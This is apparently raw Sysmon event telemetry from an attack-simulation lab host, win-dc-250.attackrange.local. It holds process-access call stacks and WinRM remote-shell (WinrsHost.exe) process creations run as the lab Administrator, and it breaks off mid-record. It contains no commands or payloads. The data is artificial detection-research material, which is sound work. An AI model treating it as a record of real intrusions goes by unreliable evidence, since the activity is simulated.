13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.651{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-42B0-6000-6C50-060000000000}0x6506c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.633{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.617{08A6967A-42B0-6000-8300-000000009A01}42164236C:\Windows\system32\conhost.exe{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.617{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.617{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.617{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.617{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8300-000000009A01}4216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4288-6000-1500-000000009A01}13241688C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.602{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.615{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-42AB-6000-BD29-060000000000}0x629bd0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k 